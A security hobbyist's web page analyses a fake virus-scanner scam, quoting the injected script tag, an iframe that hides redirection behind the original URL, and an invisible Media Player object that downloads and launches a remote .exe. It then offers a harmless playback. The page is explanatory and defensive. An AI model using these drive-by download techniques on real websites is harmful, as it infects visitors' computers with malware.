W.O.P.R   W.O.P.R Playback of Virus scanning and download of removal tool   Help

Home/xoomer/scanner.playback/xoomer.scanner.asp

An example of how the users are tempted to download malware

To take the playback, and see what the users see, you can activate this link: W.O.P.R Small picture of scanner playback Scanner Playback of faking a virus scanning and ending with a request for download.

A description of the process

There is various methods to attract the user. It can be referrer spam or blog spam, but the end result is the same. In this case the story started with a referrer spam. A bot (IP address = 66.199.250.98), leaving this url in the statistisc: h t t p : //xoomer.alice.it/mapquestinf/mapquest-directions.html (Notice xoomer.alice.it resolves to 62.211.68.12, so it's just a placeholder) The goal is to tempt the web administrator to click on the url in the statistics, thereby redericting him to infected sites

What happens if you click the link, or are being taken there by incidence

When, or rather if, you click on the link, you will get the following HTML Actually, this a leftover from somewhere in the past since xoomer.alice.it has moved. A probe for Headers @ xoomer.alice.it shows, that the site has moved around. It looks like an innocent HTML page, where there is some maps and directions, but let's invoke The Linkchecker Hey - what's that? According to the header probes for xoomer.alice.it, it should have moved. Let's look at the Javascript probe from W.O.P.R LookThe Linkchecker Notice this Javascript <script src="h t t p://scanner.malwarealarms.com/5.1/startup.php?advid=3400"></script> is(was) injected right after the <body> tag. It looks like an innocent adverticement, but in fact it is where the whole show starts. Lets' take a W.O.P.R Lookdeeper look at the Javascript. An interesting thing here is, that they only targets MS IE users at this initial stage - notice: if (is_IE) { And specially XP with servicepack 2: if (is_XP_SP2) { The initial endpoint to the malware is h t t p://xscanner.malwarealarms.com/a/Install3400.exe It is initial malware - and when installed, it will download another program to your PC. But it is not over yet, the show is going on. Look at this part from the Javascript: var promourl = "h t t p://scanner.malwarealarm.com/5.1/?advid=3400"; and document.writeln("<iframe name='myFrame' src='" + promourl + " etc.. This makes an <iframe> filling the whole window. By doing it that way, the original URL is still displayed in the Address bar. Look also at this part: if(is_XP_SP2) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; document.write("<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"); } It creates a Mediaplayer object (GUID 6BF52A52-394A-11D3-B153-00C04F79FAA6 with 0x0 px. That means it's invisible to the user. After creating the object, the malware, .exe file, is injected into the Mediaplayer here: try { iie.launchURL("h t t p://xscanner.malwarealarms.com/a/Install3400.exe"); } Now, the real show starts with the above mentioned <iframe>, let's take a look at that. First a W.O.P.R Looklook at the headers. And in this <iframe> there is the W.O.P.R LookJavascript virus scan simulator. The plain html W.O.P.R Lookwithout Javascript looks like this. The javascript files used is:
  1. W.O.P.R Lookcommon.js
  2. W.O.P.R Lookfileslist.js
  3. W.O.P.R Lookprogressbar.js

The playback - .exe file

This playback is based on actual HTML and Javascript. BUT the endpoint is of course not malware. Instead it is a little program written in Delphi, just doing a showmessage. It will show this little popup to illustrate execution of the program Picture of the showmessage popup and the source code is:
program endpoint;
uses
  Dialogs;
begin
  Showmessage('Hey, you has just been infected');
end.

The playback

Instead of using the original infected site, i made a little, allmost empty page to illustrate. Since this is a Javascript injection it will only be activated when javascript is enabled. So you can play it with or without Javascript. NOTICE Allthough you are being redirected the main URL in the address bar remains the SAME If you want to try this a home, make a simple HTML file, and insert this tag right afteer the body tag: <script src="http://wopr.float4you.com/xoomer/scanner.playback/playback.startup.js.asp?advid=3400"></script> It it the same as the one used in this playback. It is made as an .ASP file to illustrate hiding the .js extension, but due to the readers, i kept .js., so one will know it is a Javascript file. Save the file on your local disk, or your own website, an see what happens when you opens it.